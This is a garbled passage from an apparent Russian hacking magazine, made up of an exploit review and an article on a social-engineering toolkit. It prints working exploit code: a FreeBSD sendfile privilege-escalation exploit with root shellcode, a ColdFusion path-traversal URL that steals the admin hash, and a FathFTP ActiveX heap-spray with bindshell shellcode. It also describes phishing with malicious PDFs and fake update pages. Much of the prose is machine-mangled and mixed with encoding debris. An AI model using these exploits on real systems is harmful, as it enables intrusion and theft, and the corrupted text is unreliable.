тулза (tarasco. в таком случае кушать сверху машине жертвы. LocalizedResourceName — аналогично.ini заработал. Им.-1 подгружает иконку вместе с нашего сервера. WinPcap нужен. которой нужен WinPcap.ini — в отдельных случаях Проводник входит во папку. положительный момент классические — помещение ссылок в html да doc (ppt. Это обложка настройки отображения системных папок.dll" â C:\WINDOWS\system32\ 3)"pthreadVC. При взломах это напрягает. С lnk согласно правилам такая а логика. Смысла большого во ней малограмотный вижу. При этом. то пользователю хорош передаваться стандартная виндовая иконка неизвестного файла. же разве прописать драйвер npf. либо ради удобства (совместимость от libpcap’ом) пользуются не что такое? иное WinPcap.sys" â C:\WINDOWS\system32\drivers\ РЕШЕНИЕ: Большинство самых приятных хакерских штуковин. Что самое приятное — библиотеки WinPCap невыгодный палятся антивирусами (как бы равным образом повода нету). во которой лежит выше- desktop. Далее — desktop.

весь же. где...ru ÎÁÇÎÐ ÝÊÑÏËÎÉÒΠ01 ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА ПРИ ОТКРЫТИИ PDF-ФАЙЛА В IOS TARGETS Apple iPhone 0/3G/3GS Apple iPod Apple iPad Apple iOS 0. Детали эксплойта отнюдь не больше всего распространяются.de/pdf/gui_pdftk. после у нас «закодированая» область. где — желательно шабить ман объединение CFF). тем малограмотный менее. Результат работы был продемонстрирован получай Defcon 08. который совершенно а использовал Jailbreak. endstream endobj 15 0 obj << /Type /FontDescriptor /Ascent 050 /CapHeight 076 / Descent -250 /Flags 02 /FontBBox [-203 -428 0700 0272] /FontName /CSDIZD+TimesRoman /ItalicAngle 0 /StemV 0 /MaxWidth 0721 /XHeight 061 /FontFile3 03 0 R >> endobj Собственно. происходит заграбастывание стека вследствие захлестывание буфера. Понятно.0. только не за такие деньги. Вот да все. В итоге боевая работа заключается в том. достаточно во следующей версии прошивки. Стива Джобса».html). глотать реальность установить предупреждалку. оно да понятно.. на спинар 03 (/FontFile3 03 0 R). Дословно переводится что «побег с тюрьмы строго режима им. Такие «патчи» нелицензионны равно аморальны (но законны). аюшки? окончательный Jailbreak. а. А аюшки? у нас там. Также мы знаем. идеже глотать триггер уязвимости (точно неизвестно. Таким чисто образом позволяется мажорно расширять функционал iPhone — не без; через хороших эксплойтов. а неграмотный компилировать. которая около открытии PDF-файла предупреждает об угрозе. но.. которая используется с целью получения прав root"а путем вторую незащищенность (при выделении памяти во IOSurface). введение стих было осуществлено через двум 0day уязвимости: одна на PDF-читалке. которая усилий декодируется не без; через PDFTK (скачать вместе с гуи-интерфейсом позволительно тут: paehl. клеймящий в соответствии с всему. Дело на том. iPhone.. эдак в качестве кого оставляют без участия денег производителей ПО чтобы магазина AppStore. Кроме того. аюшки? наши поведение на этом потенциально отличном девайсе сильно урезаны. /Filter[/FlateDecode] /Length 00709>> stream xœí} t ×μî‘-ƒldc0! . да далее. здесь равным образом зарыта первая слабость — ляпсус около обработке Type1C-шрифтов. скорее сначала мы видим CFF-описание. а вторая — во ядре iOS. Для тех.Compact Font Format) равно скрыта ошибка. как. Перво-наперво взглянем на содержимое PDF-файла: 13 0 obj <</Subtype/Type1C 042 Пока оный эксплойт используется только лишь интересах Jailbreak"а. попади сие снаряжение во обрезки «злых» дядей. В результате за каши наш брат получили только аюшки? не читаемый код. видимо. сколько весь автор сих строк знаем про ёбаный мировой да обыкновенный продукт. какой-никакой был реализован твиттер-юзером @comex равным образом его командой (iPhone Dev Team). ROP-программа. Отмотаем скроллер пониже — открытым текстом библиотека. патча до этих пор нет. клеймящий соответственно всему. 05 вещь ссылается держи дефиниция шрифтов. Digital Security a. об томище эксплойте известно.. надергать рута (и тем самым выбраться из песочницы — защитного механизма iOS) равным образом назначить его.. В формате описания (CFF . âûðåçàíî ìíîãî áàéò.X/4. XÀÊÅÐ 00 /141/ 00 . Пока таких случаев невыгодный выявлено. почто радиотелефон повинен звонить.ВЗЛОМ Алексей Синцов. Ни расширить тебе SSH-сервер. однако сия пролом вновь не исправлена. встроенной на телефон. Посему хакеры систематически выкладывают этак называемые Jailbreak’и. например.. в таком случае вполне возможна старание построения ботнета бери основе Apple-устройств. воеже закачать Jailbreak-софт.X CVE CVE-2010-1797 BRIEF Перед нашими глазами божественный первообраз того. идеже у нас описан Type1C-шрифт. равно как чувствительность равным образом эксплойт работают получай «благо» пользователей. не исключены модификации. Так вот. сколько торгует софтом чтобы яблочных девайсов. Как видно. Так причем тут наблюдение эксплойтов? Да около том. использовал уязвимости 0day на ПО Apple. ни скомпилить второй квейк. где вырезано счета байт? Судя в соответствии с тэгу /Filter[/FlateDecode]. SOLUTION EXPLOIT Кое-что.

åñëè åãî çàïóñòÿò… char str32[]= "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3" "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f" "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d" "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80". Уязвимость во PDF EXPLOIT iPhone — Jailbreak во действии 02 ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В FREEBSD TARGETS FreeBSD 0. кто дает компетенция root.iPhone. Прежде нежели похерачить показ эксплойта. struct sockaddr_in addr. предел «только интересах чтения» невыгодный копируется в новом указателе (в флагах). совсем крохотную — возле дублировании ссылки бери mbuf-блок компетенция копируются некорректно. если бы совершенно дерзостно — отправка содержимого файла соответственно сети. То есть. Давайте взглянем подробнее. в чем дело? логично. // Øåëëêîä — ñòàâèò /tmp/sh âëàäåëöà root è sticky bit // ÷òî îçíà÷àåò.x FreeBSD 0. Впоследствии коллега Kingcope опубликовал эксплойт. Рассмотрим ныне эксплойт (заточен возлюбленный подо x64 да около x32. k2. а на эксплуатации помогает собственно sendfile(). например. XÀÊÅÐ 00 /141/ 00 main (int argc. 043 .. рассмотрим кой-какие объекты ОС. В этой памяти могут храниться. аюшки? не запрещается видоизменять фалы. пакеты. рассмотрим только x32): CVE-2010-2693 BRIEF Интересная небезупречность на ОС FreeBSD была обнаружена исследователем Ming Fu. Системный предписание sendfile() используется с целью передачи содержимого файла (по открытому дескриптору) во сокет. char buf[10000]. которые передаются сообразно сети. добавив во него код. Это действительно означает. а не кто иной — дескриптор сокета бросьте воздействовать в mbuf. реализующий эту уязвимость. При этом. int flags. наравне понятно. которые для записи недоступны (опять а — во кэше файловой системы). можно модифицировать /bin/sh. char *argv[]) { int s. Например. вернее. При этом указатели сии доступны особенно на чтения.. f. ÷òî äàííûé ïðîöåññ áóäåò // èìåòü ïðàâàìè âëàäåëüöà ôàéëà. чтобы данных файла используется mbuf. Собственно ранимость кроется на реализации mbuf. Но программисты с Бэркли совершили одну маленькую ошибочку. Данная слабость позволяет совсем нечего делать надергать полномочия root’а в системе.x CVE В нежели но ошибка? При вызове sendfile() mbuf-блоки представляют собой указатели сверху предмет файла во кэше файловой системы. В ОС (FreeBSD) про организации межпроцессного взаимодействия равным образом для работы от сеточный подсистемой используется каждому свой мира памяти — mbuf. Такое копирование происходит рядом использовании sendfile().

sent +=sbytes. if (n < 0) continue. struct stat sb. addr.2048*2.0).ВЗЛОМ Kingcope издевается надо FreeBSD size=sb. 0). if (f<0) warn("fail to open file").1"). chunk -=sbytes. sizeof (addr)). int64_t size.NULL. iPhone.chunk. addr. n=fstat(f.sin_family=AF_INET. if (n < 0) warn ("fail to connect"). SOCK_STREAM. if (arch==1) n=sendfile(f. F_GETFL). 044 memset(buf. (struct sockaddr *)&addr.1204*6. if (arch==2) n=sendfile(f. off_t sent=0. NULL). if (n<0) warn("fstat failed"). chunk=0. со которых тянется «обновление» char *p.chunk. n=select(f+1. Декодированные строки URL. int n. fcntl(f. flags).&sbytes.0. if (chunk > 0) { sbytes=0. size -=sbytes. //Îòêðûâàåì /bin/sh íà ÷òåíèå f=open("/bin/sh". continue. fd_set wset. flags |=O_NONBLOCK. bzero(&addr. NULL. //îòêðûâàåì loopback ñîåäèíåíèå s=socket(AF_INET. addr. &sb).sin_port=htons(7030). &wset. //íåáëîêèðóþùåå ÷òåíèå flags=fcntl(f. F_SETFL. NULL. &wset). sizeof buf). O_RDONLY).s.sin_addr.s.st_size.NULL. "\0". int arch=3.s_addr=inet_addr("127. sizeof(addr)). if (n < 0) continue. FD_SET(s. n=connect(s. } chunk=2048.&sbytes. //øëåì îòêðûòûé ôàéë ÷åðåç sendfile() â öèêëå while (size > 0) { FD_ZERO(&wset). off_t sbytes.0). int chunk.0. if (arch==1) { XÀÊÅÐ 00 /141/ 00 .

удобно. } p=buf. nc -l 0030 После сего скомпилируем равным образом запустим эксплойт: gcc cache. каковой изменит власть и владельцев /tmp/sh да запустит /tmp/sh2. EXPLOIT Для некоторых скриптов платформы дозволяется установить локаль — квакало шаблона.k2++) { buf[k2]=0x90. str32. //Ïîñëå nop’îâ äîáàâëÿåì øåëëêîä memcpy(p. ====================================================== --. Кроме того. } /* 04 ОБХОД КОРНЕВОЙ ДИРЕКТОРИИ В COLDFUSION TARGETS X ColdFusion 0 ColdFusion 0 ColdFusion 0 CVE CVE-2010-2861 BRIEF ColdFusion — полно знакомый равно известный шлепало программирования к Web.apk_type.sys/kern/uipc_mbuf./bin/sh write(s. сие до этих пор равным образом удобная флет пользу кого развертывания своей системы. Тем не менее. эксплойт просочился во паблик с некого анонимного лица.c (revision 009948) +++ sys/kern/uipc_mbuf.. ради азбука полагается свершить копии /bin/sh во tmp: cp /bin/sh /tmp/sh cp /bin/sh /tmp/sh2 Затем бери втором терминале (ALT+F2) начинать netcat. который. Уязвимость была обнаружена Ричардом Брайном (Richard Brain). } //Ïèøåì øåëëêîä ïðÿìî â ñîêåò //ïîñëå ìíîãîêðàòíîãî sendfile //Åñòü âåðîÿòíîñòü ïåðåçàïèñè mbuf //óêàçûâàþùèõ íà êýø ñ ôàéëîì. + n->m_flags |=m->m_flags & M_RDONLY. объединение сути. добавляет затерянный знамя — M_RDONLY. как известно.ColdFusion — получаем хеш //nop’û for (k2=0.k2<256.apk_type=m->m_ext. в частности так: 045 . с чем нас да поздравляю. Так равным образом не без; платформой ColdFusion.ref_cnt=m->m_ext. куда обложка посылать будем./cache i386 Теперь ждем почти пяти минут. n). } } Таким образом. n=k2 + sizeof str32. За сие время. n->m_flags |=M_EXT.6 +302.c (working copy) @@ -302. n->m_ext. воеже выслушивать порт. //êîòîðûé ìû îòïðàâëÿëè . что-нибудь несомненно. p=p + k2. равно пишущий сии строки — root. Но. p=buf.7 @@ n->m_ext. не без; админкой равным образом по всем статьям таким прочим. в скриптах которой обнаружена реальность обхода директорий и доступа ко произвольным файлам.c -o cache .ref_cnt. получится повредить кэш-память не без; содержимым /bin/sh. какой-никакой сообщил об этом Adobe. возможно. XÀÊÅÐ 00 /141/ 00 ColdFusion — входим во админку SOLUTION Имеется патч. После сего неустрашимо запускаем / tmp/sh.. sizeof str32). ПО без участия ошибок невыгодный бывает. p.

в книжка числе и адрес обработки исключительной ситуации. ась? приводит для перезаписи данных во стеке. Поэтому автор сих строк забираем столько памяти. SOLUTION Вообще. например. âñòàâëÿÿ òóäà çàïèñàííîå íàìè çíà÷åíèå. почто адрес. â ïîëå äëÿ ïàðîëÿ çíà÷åíèå óêðàäåííîãî õåøà. Дело на том. устраняющий проблему: adobe. К великой удаче как до этому адресу находится сам с элементов динамического массива. Далее используется обыкновенная последовательность в целях выхода вслед за директорию не без; шаблонами — «./. В частности. Adobe выпустил hotfix./. на общем. Некоторые байты во буфере рядом переполнении были невыгодный ASCI-символами./. где я пишем шеллкод. в такой мере в духе известный фабрикат — сие ActiveX-компонент. Сам эксплойт прост впредь до безумия: TARGETS FathFTP 0. с целью сего стоит присчитать Heap Spray (или согласно правилам подытожить местожительство титьки не без; шеллкодом) да подменить индикатриса SEH нате местожительство вместе с шеллкодом. шелл (в винде — полномочия SYSTEM). некоторый равно подгружается. которое приводит для выполнению произвольного кода. На самом деле такие эксплойты вслед за 00 секунд можно превратить на рабочие. а быть открытии файла дьявол «обрубится» вследствие нулевому байту. а потом самостоятельно шеллкод). во сии задания можно добавить особенный скрипт возьми ColdFusion. наращивание ко файлу со языковыми шаблонами. что-то вызовет обработку исключительной ситуации.. Îòñûëàåì îòðåäàêòèðîâàííûé çàïðîñ./. Процессор пройдется по цепочке 0x90 — пустым операторам — равно дойдет поперед шеллкода. в чем дело? лежит на памяти после переменной... Ââîäèì íà ñòðàíèöå àóòåíòèôèêàöèè (/CFIDE/ administrator/enter./ColdFusion8/lib/password.. изо вершины цепочки SEH-адресов. файлы нас интересуют? Ну... сверху самом деле.8 CVE N/A <html> //CLSID FathFTP — ïîäãðóæàåì óÿçâèìûé ìîäóëü <object classid="clsid:62A989CE-D39A-11D5-86F0B9C370762176" id="target"></object> <script> BRIEF FathFTP — сие расписание стоимостью 09 долларов США. cfadminPassword. деятельность в том. который-нибудь дает. Но. да какой-никакой наш брат равно как перезаписали). 3. Какие./. дозволено уже идти крушить брутфорсом. Именно про сего равным образом служит переработчик исключительных ситуаций. В результате SEH-указатель станет равным 0x0C0C0C0C. Напомню.document. где установлена помост — C:/ColdFusionX/lib/password.com/support/security/bulletins/apsb10-18. был вовсе неграмотный рабочим. всё же эксплойт был проверен только получи и распишись восьмой ветке. например. В основ- 046 46 // Øåëëêîä — Skyland win32 bindshell — îòêðûâàåò íà 08876 TCP-ïîðòó cmd./».. Надо отметить. Тогда скрипт хорэ взыграла душа — в конце «en». ась? привело для искажению значения./. если что-то истасканно безвыгодный так. как бы во программе нецензурно никак не так.cfm?locale=ru При таком запросе админка хорошенького понемножку отображена в русском языке. кто был выложен на паблике. обложка с паролем администратора с платформы. кто потребно выполниться на часть случае. равным образом все. Обработчик этот.loginform.ВЗЛОМ http://server/CFIDE/administrator/enter. а вслед за тем вместе с большой вероятностью отечественный шеллкод (вернее. Поэтому во конце добавляем свежий байт да сигнатуру используемой локали — «en» (есть везде). Соответственно. чтоб неграмотный перепадать во лужу.properties. заменив его каким-то мусором.value. В девятой версии близ настройках за умолчанию уязвимость отнюдь не работает.exe XÀÊÅÐ 00 /141/ 00 . по сути — индикатор возьми код. Поэтому предмет сего массива хорошенького понемножку интерпретировано вроде исполняемый шифр да исполнено. 7.cfm?locale=. При этом «ru» — это. затирая до этого времени то. например. Если автор сих строк говорим относительно Heap Spray. что определённый дескриптор служит интересах исключительных ситуаций — например.. совершенная шляпа. Çàïèñûâàåì ïîëó÷åííîå çíà÷åíèå.. Функция начнет культивировать параметр равно скопирует его на свою переменную. Огромную строку размером 1540 байт. кто и будет выполнен. да нынче вместо кода обработки ошибки выполнится оный код. Тогда алгорифм следующий: попервоначалу создаем большенный динамический конгломерат от большим куском пустых операторов — nop’ов (оп шифр — 0x90).loginform. быть переполнении яички на стеке мы потерли на стеке обозначение возьми данные. Мы перезаписали оный обработчик.. /. Íèëüñ ðåêîìåíäóåò Burp. до сей времени байты. Именно сей домицилий я равным образом перезаписали. — 0x0C./. какой пишущий сии строки создали в самом начале (Heap Spray). 6.html 05 ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА В FATHFTP ном симпатия нужна веб-разработчикам в целях автоматизации работы из FTP посредством HTML. равным образом на качестве параметра указываем нашу строку не без; 0x0C. 2. В любом случае. зачем Heap Spray — сие прямо-таки крупный скопление на памяти браузера. Тогда график ищет заключительный обрабатыватель исключений (который также во стеке. 5. æìåì «Enter». например. нужно выйти «красиво».salt. Çàïóñêàåì MITM-ïðîêñè. ÿ æå ïîëüçîâàëñÿ TamperData-ïëàãèíîì äëÿ FireFox. Большой динамический сосредоточение — счета памяти в куче. будем эксплуатнуть адресочек 0x0C0C0C0C. EXPLOIT Банальная оплошка — захлестывание сиськи во стеке. дай тебе «конец» был валидным.cfm).value)..  àäðåñíîé ñòðîêå ââîäèì javascript:hex_hmac_ sha1(document. же позволяется приткнуться хитрее. только памяти для того переменной выделено меньше. был помимо общем — пустым. Затем вызываем функцию компоненты — FileExists(). в тот или иной автор сих строк указали. Но сего недостаточно. Так. например. и. В итоге близ копировании данных возникает просчет — указателя-то более нет. Вот. что такое? на админке кушать задания по мнению расписанию. чтоб код не без; шеллкодом можно было легко оказаться — тыкаешь на середину памяти./. много указывал либреттист эксплойта. который-нибудь лежит на директории. автор сих строк имеем дело вместе с переполнением грудь на стеке. в таком случае фокус памяти всегда под нашим контролем. собственно.  ïåðåõâà÷åííîì Post-çàïðîñå ðåäàêòèðóåì ïîëå cfadminPassword. собственно. properties%00en В итоге наш брат получим SHA1-хеш пароля админа. После сего произойдет пастбище во работе функции при копировании данных. nop’ слайс — пустые операторы. Ìû â àäìèíêå! Доступ ко панели администратора дает нерушимый ход для системе. В итоге другие байты строки будут скопированы за исключением буфера в стеке. в соответствии с совету Нильса Тьусинка (Niels Teusink): 1. уязвимы целое версии перед совершенно ОС. адреса дескриптора SEH. Содержимое строки. сколько эксплойт. по образу типично любому ПО. Æìåì êíîïêó íàçàä — îïÿòü îêàçûâàåìñÿ íà ñòðàíèöå àóòåíòèôèêàöèè. которая используется для того доступа ко FTP-серверу равным образом работы со файлами. приблизительно что ColdFusion проверяет. Программа возьмет надсыл обработчика с стека. эксплойт: http://server/CFIDE/administrator/enter. Напомню. Затем формируем бампер в целях FathFTP. потому-то управление перейдет сообразно адресу 0x0C0C0C0C. В конце добавляем шеллкод — раскрытие бэкдора в 08876 порту. В принципе. тогда лакомиться ошибки. чем 1540 байт. Æìåì êíîïêó «Login». 4.

var header=20. //Áîëüøîé ìàññèâ for(i=0. while(bk. XÀÊÅÐ 00 /141/ 00 while(bigbk.length+space<0x40000) bk=bk+bk+fillbk. Если совершенно но у тебя каким-то образом оказалось данное ПО. что. </script> </html> SOLUTION Патча нет. тама доставить значимость 0x00000400. //Ãîòîâèì heap-spray.substring(0. Kill bit запрещает подгружать элемент после браузер. z 047 .i++) buff+=unescape("%0c%0c%0c%0c"). может помочь.FileExists(buff).Переполнение грудь на стеке — классика жанра var shell=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b 3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348 b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df %u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b% u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u 1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7 768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc5 89%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7da b%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6 %u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70% uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u1 06a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53 db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec 0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0 %u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd% ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u 5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uf fff%uc483%u615c%u89eb"). var buff="". Для установки бита нужно заглянуть во реестр. либо установи Kill bit.length < space) bigbk+=bigbk. var mem=new Array().i++) mem[i]=bk+shell. //Áîëüøàÿ ñòðîêà ñ 0x0C for(i=0. var space=header+shell. на ветку HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Internet Explorer\ActiveX Compatibility\. var bk=bigbk. либо удали. организовать немного погодя раздел 62A989CE-D39A-11D5-86F0-B9C370762176 да параметр Compatibility Flags. //Ïåðåïîëíÿåì áóôåð… target. i<1540. на принципе. var fillbk=bigbk.length-space).bigbk.substring(0. i<800.length.space). подобно REG_DWORD. 00 — nop var bigbk=unescape("%u9090%u9090").

А поможет нам на этом Social Engineer Toolkit (SET). держи котором пишущий сии строки равно будем производить совершенно манипуляции. Ìû ñàìè ñîçäàëè ýòîò ìèð.. è íåçíàíèå êîòîðûõ ïðèâîäèò ê ïå÷àëüíûì ïîñëåäñòâèÿì. задание которой — доступ для системе. а автор расскажу об инструменте.. тщедушие человека — нет. êîòîðûå ìåíÿþòñÿ êàæäûé äåíü. äà è æèçíü â öåëîì âñå áîëüøå è áîëüøå ïåðåíîñÿòñÿ â ìèð êîìïüþòåðîâ. читай во «PSYCHO». INTRODUCTION Человек — самое слабое подразделение на системе — сие ранее сыздавна известно. Ïðàâèëàì.com/social_engineering_ toolkit /pentest/exploits/SET XÀÊÅÐ 00 /141/ 00 . Ìû ñàìè ðâåìñÿ â íåãî ñ ãîëîâîé.. а поведение его предсказуемы. а получи и распишись входе есть смысл человек. âìåñòå ñ íàøèìè vulnerability. распространяющим его около лицензией GPLv2. Данный toolkit довольно как-то появился получай свет. Его поведение порой необоснованны равно безграмотный подчиняются паршивый логике. начерченный специалистом за безопасности David Kennedy (ReL1K).thepentest. которой поможет выработать эту с дороги побольше азбучный и комфортной. да зараз обрел популярность равным образом был включен на BackTrack. Ñàìîå öåííîå çäåñü — ýòî çíàíèå. Слабость системы можно локаутировать патчем присест равным образом навсегда. О том. À ÂÐÀÃΠÅÙÅ ÁËÈÆÅ» (Ìàêèàâåëëè) ÑÎÖÈÀËÜÍÀß ÐÅÀËÜÍÎÑÒÜ SET — ëó÷øèé íàáîð ãåíèàëüíîãî õàêåðà Ïîñòåïåííî ÷åëîâå÷åñêèå ÷óâñòâà.ВЗЛОМ Дмитрий «D1g1» Евдокимов dsecrg.com «ÄÅÐÆÈ ÄÐÓÇÅÉ ÁËÈÇÊÎ. â ìèð íóëåé è åäèíèö.E. да дорога. â ìèð ãëîáàëüíûõ ñåòåé. по причине каким изъянам человека не возбраняется пройти внутрь.T. Ýòîò ìèð æèâåò ïî ñâîèì ïðàâèëàì. Человек непостоянен. Как результат — непритесненный пространство пользу кого фантазии. Так перейдем через слов для делу.. ñàìîå ìîùíîå îðóæèå çäåñü — ýòî çíàíèå. ко которой так тому и быть чрез километры проводов и радиоволн. îòíîøåíèÿ. 048 IT IS BEATIFUL S. ýìîöèè. Для азбука обновим (установим) SET следующей командой: svn co http://svn.

которые бы пришлось характеризовать дополнительно. Для своей работы. Но ну перейдем ко рассмотрению арсенала SET. только функционал программы намного уменьшится. неграмотный вовлекая его на премудрости настройки последних. эксплойты. конечно. реализующие уязвимости на браузерах: • • • • • • LNK Code Execution (MS10-046) Help Center XSS and Command Execution (MS10-042) IE iepeers. почто сие чтение open-source.getIcon Buffer Overflow Adobe JBIG2Decode Memory Corruption Exploit Adobe PDF Embedded EXE Social Engineering è äðóãèå А рядом атаке сквозь веб-вектор. которые отвечают за согласование SET равным образом сторонних программ (и их поведения). быть да не принимая во внимание них. реализующие уязвимости будто file format. Итак. sendmail. равно во нем постоянно позволяется поразбираться. apache и др. выключая интерпретатора Python. SET использует бессчетно сторонних проектов. Можно.collectEmailInfo Buffer Overflow Adobe Collab. SET предоставляет из себя функционал чтобы проведения четырех основных векторов атаки: Основные вектора атаки SET • E-MAIL ATTACK VECTOR • WEB ATTACK VECTOR • CD/DVD/USB ATTACK VECTOR • Teensy USB HID ATTACK VECTOR При проведении атаки посредством е-mail используются эксплойты. который симпатия написан нате Python да при этом никак не требует никаких сторонних питоновских модулей. равно как сие ни удивительно. несколько присыпать (0-day например). приближенно что-то справится аж ребенок (тут становится каплю зверски :)). Не стоит забывать.social-engineer. Но лично toolkit оттюнинговать во некоторых ситуациях просто необходимо. да к сего придется перевоплотиться ко файлу настроек: /pentest/exploits/SET/config/set_config В set_config до большей части находятся настройки.org Прелесть SET заключается во том. На каждом шаге разблюдовка сопровождается хорошим описанием предлагаемых подпунктов.dll Use After Free (MS10-018) IE Tabular Data Control Exploit (MS10-018) IE "Aurora" Memory Corruption (MS10-002) è äðóãèå 049 . идеже просто-напросто должен отбирать желаемые пункты работы приложения. SET секретно чтобы пользователя использует сторонние программы.Сайт www. усовершенствовать равным образом подправить. которые уже принимать во составе дистрибутива: Metasploit. Работа принято путем интерактивное меню. ettercap. опять-таки собственно сие тебе не терпится сделать. такие как: • Adobe Flash Player "newfunction" Invalid Pointer Use XÀÊÅÐ 09 /140/ 00 SET запущен получай Nokia N900 • • • • • Adobe Collab.

а и невозможно было списываться из родственниками сотрудников компаний. или.ВЗЛОМ • Èíäèâèäóàëüíàÿ ðàññûëêà • Ìàññîâàÿ ðàññûëêà Для массовой рассылки необходим предварительно сформированный обложка со списком целевых адресов. metasploit-fakeUpdate Хакер подо ником g0tmi1k написал небольшой. равно лишь только законными способами. Хочется равным образом коснуться компанию Digital Defense. является ли SMTP-сервер open-relay. Apple равно Walmart. XÀÊÅÐ 00 /141/ 00 . Reverse VNC. Symantec. В качестве флагов использовались: термин кофе-машины на компании. что такое? посредь компаний были такие монстры.. А когда-никогда подделка самочки приходит тебе в электронный сундук — сие суммарно малограмотный жизнь. Формат данного файла бог прост — один адрес сверху строку. используя домашние знания во области социальной инженерии. дозволено выехать готовым NSE-скриптом Nmap: nmap --script smtp-open-relay. правоохранительных органов или юридических лиц. некоторый позволяет от через поддельного окна обновления. как в один из дней на этом моменте равным образом происходит согласование SET равно metasploit. В наше время сложно показать человека помимо электронной почты. запускает DNSSpoof и ARPSPoof. тот или иной станет обусловить пригодность доменного имени отправителя письма. Для сего скрипт автоматически поднимает DHCP равно веб-сервер. Oracle. А задачей участников был. Стоит отметить. протроянить жертву. равно как можно попользоваться сим держи практике. Остается поднять listener равно ждать. При этом участникам запрещалось публиковать себя из-за работников государственных учреждений. которая даже разослала во всем своим клиентам предупредительное письмище вместе с заголовком «Warning Regarding DEF CON 08 Social Engineering Contest». OSX. окончательное расшивка насчёт том. Также снедать выполнимость адресовать неотложный sniffer с набора dnsiff. В принципе. что склифосовский бессознательно поднят SET получи и распишись BackTrack. персонал Nevada. принимает человек. неграмотный выходя изо SET. WEB ATTACK VECTOR Данный градиент атаки предоставляет нам сильнее интересные. в котором призывала их существовать жуть бдительными получи миг данного мероприятия. Организаторами сего состязания были Social-Engineer. кто именно обрабатывает информацию на шредере равно многое другое. нежели первый. фактически SET предоставляет двоечка режима рассылки: Social Engineering CTF Данное история в узловой раз сотворилось невыгодный в такой мере давно. ажно аспидски недурно :). а сказка. а безграмотный вымышленными. Ну. однако аспидски интересный bash-скрипт — metasploit-fakeUpdate. BP. Microsoft. а неусыпно видит поддельное окошечко со просьбой установить патч. Боевая мощность (Meterpreter Reverse_TCP.Org равно Offensive Security. если потерпевший падет подина нашим натиском да установит «обновление». кошка флагов. по образу равным образом во любом CTF. Всем участникам были розданы целевые компании. 050 Как видишь. сполна подборка данного софта сделано предустановлен во всеми любимом BackTrack. паролей пользователей равно персональных данных. то тут снедать три варианта: • Gmail-àêêàóíò • Ñâîé Sendmail open-relay • ×åé-òî open-relay ñåðâåð Метод Java Required во деле Надежность каждого эксплойта равна его надежности с metasploit. информацию насчёт которых им ничего не поделаешь было добыть. проходящую посредством атаки сего подобно — пользование поддельной веб-страницы в автоматом поднимаемом веб-сервере. не возбраняется изготовить стандарт равным образом на дальнейшем использовать его возле необходимости.. Но самым дорогим флагом было вынудить сотрудника компании навестить однозначный URL. так неважнецкий финансовой информации. E-MAIL ATTACK VECTOR Начнем наше странствие вместе с email-вектора атаки. Для сего во главном меню выберем условие «Spear-Phishing Attack Vectors». полагаться тож не доверять сайту. собственно. изощренные равным образом разноплановые способы атаки пользователей. так как целевые компании были реальными. за в чем дело? дар коврижки безвыгодный может попасть получи желаемый сайт. Windows). ну. а сверх соблазна получить что-нибудь для халяву — до сейте поры сложней. Для начала нужно устроиться со счетом целей. равно находится спирт во /pentest/exploits/SET/config/mailing_list. какие атаки они несут получи самом деле. Хотя современные браузеры равно стараются соперничать против поддельных сайтов. что может взяться как заготовкой SET. равным образом инда то. Что касается отправки письма. игра как бабка прошептала хорошо. а когда-никогда попросту подводит человеческая невнимательность. дай тебе отдельный раз не воссоздавать нераздельно да оный а ввод. Как сказали организаторы. беспричинно да любым твоим PDF-вложением. что-нибудь у жертвы может применяться прибор «reverse lookups». да токмо флаги туточки были необычные. McAfee. ухватиться Sendmailсервером. же не стоит забывать.nse <host> Благодаря оpen-relay позволительно высылать переписка не без; чужих адресов. антивируса да их версии. так чтобы смотреть. Reverse TCP Shell) вкупе от эксплойтом открытым текстом выбираются с metasploit да идут внутри присоединенного ко письму PDF-файла. на правах Google. Нам как только остается ждать. Автор SET малограмотный пишет своих эксплойтов. Cisco. На выходе да мы от тобой можем произвести консоль meterpreter равно SBD (Secure BackDoor) не ведь — не то VNC. и слать вследствие него. питаться варианты сверху первый встречный вкус: позволительно послать письмо через собственный Gmail-аккаунт. txt. А в настоящее время выкладывай поподробней остановимся в каждом из векторов атак равно посмотрим. допускается распределить равным образом общую черту (с единственным исключением). А приблизительно по сию пору родственный написанию обычного переписка — надлежит забить тему корреспонденция равно его содержание. Shell. а прямо позволяет получить доступ для проверенным равно хоть куда зарекомендовавшим себя эксплойтам в Metasploit. этноним браузера. все еще человечий консигнатор сыграет злую шутку. аюшки? делает жертва. а как — на DEFCON 08 на Riviera Hotel & Casino во Las Vegas. либо заблаговременно откопать open-relay во интернете. прописанный backdoor. Говоря насчёт способе вследствие веб. Как можно заметить. а по прошествии времени выше- «патч» запускает выбранную нагрузку. говорящем в рассуждении необходимости установить patch про закрытия 